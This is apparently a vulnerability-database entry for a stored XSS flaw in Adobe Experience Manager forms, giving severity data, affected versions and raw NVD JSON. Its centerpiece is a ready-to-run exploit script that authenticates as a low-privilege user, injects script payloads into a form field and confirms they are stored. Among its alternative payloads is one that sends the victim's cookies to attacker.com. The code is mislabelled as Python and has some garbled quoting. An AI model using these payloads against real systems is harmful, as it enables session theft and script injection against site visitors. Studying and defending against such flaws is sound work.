Security Vulnerability Report
中文
CVE-2025-64590 CVSS 5.4 MEDIUM

CVE-2025-64590

Published: 2025-12-10 19:16:22
Last Modified: 2025-12-12 18:15:10
Source: [email protected]

Description

Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:adobe:experience_manager:*:*:*:*:-:*:*:* - VULNERABLE
cpe:2.3:a:adobe:experience_manager:*:*:*:*:aem_cloud_service:*:*:* - VULNERABLE
cpe:2.3:a:adobe:experience_manager:6.5:-:*:*:lts:*:*:* - VULNERABLE
Adobe Experience Manager 6.5.23及更早版本
Adobe Experience Manager 6.5.x < 6.5.24

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-64590 Adobe Experience Manager Stored XSS PoC // Target: Adobe Experience Manager forms // Prerequisites: Low-privilege user account const axios = require('axios'); const cheerio = require('cheerio'); class AEMXSSExploit { constructor(baseUrl, username, password) { this.baseUrl = baseUrl; this.username = username; this.password = password; this.session = axios.create({ baseURL: baseUrl }); } async authenticate() { // Login to Adobe Experience Manager const loginData = new URLSearchParams({ j_username: this.username, j_password: this.password, validate: 'true' }); const response = await this.session.post('/libs/granite/core/content/login.html/j_security_check', loginData); console.log('[+] Authentication attempted'); return response.headers['set-cookie']; } async injectXSSPayload(formPath, fieldName) { // Stored XSS Payload Injection const xssPayload = '<script>alert(String.fromCharCode(88,83,83,32,80,111,67))</script>'; const formData = new FormData(); formData.append(fieldName, xssPayload); formData.append('./jcr:data', xssPayload); // Alternative event handler payloads const altPayloads = [ '<img src=x onerror="alert(document.cookie)">', '<svg onload="alert(document.domain)">', '<body onload="fetch(\\'https://attacker.com/steal?c=\\'+document.cookie)\\'>">' ]; try { // Submit form with XSS payload const response = await this.session.post(formPath, formData, { headers: { 'Content-Type': 'multipart/form-data' } }); console.log('[+] XSS payload injected successfully'); console.log('[+] Payload:', xssPayload); return true; } catch (error) { console.error('[-] Injection failed:', error.message); return false; } } async verifyStoredXSS(pagePath) { // Verify the XSS payload is stored and rendered const response = await this.session.get(pagePath); const $ = cheerio.load(response.data); if ($.html().includes('<script>alert') || $.html().includes('onerror') || $.html().includes('onload')) { console.log('[+] Stored XSS verified!'); console.log('[+] Payload persists in:', pagePath); return true; } return false; } } // Usage Example const exploit = new AEMXSSExploit( 'https://vulnerable-aem-instance.com', 'lowpriv_user', 'password123' ); (async () => { await exploit.authenticate(); await exploit.injectXSSPayload( '/content/forms/af/vulnerable-form/jcr:content/guideContainer.af.internalsubmit.jsp', 'name' ); await exploit.verifyStoredXSS('/content/forms/af/vulnerable-form.html'); })();

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64590", "sourceIdentifier": "[email protected]", "published": "2025-12-10T19:16:22.240", "lastModified": "2025-12-12T18:15:10.477", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:experience_manager:*:*:*:*:-:*:*:*", "versionEndExcluding": "6.5.24.0", "matchCriteriaId": "0FC0CE20-2AC2-45FB-A7CF-9ADEEBC8B411"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:experience_manager:*:*:*:*:aem_cloud_service:*:*:*", "versionEndExcluding": "2025.12.0", "matchCriteriaId": "3326AB8A-7DF7-437C-86B6-58BA768E42E5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:experience_manager:6.5:-:*:*:lts:*:*:*", "matchCriteriaId": "852C2582-859F-40DB-96CF-E1274CEECC1F"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.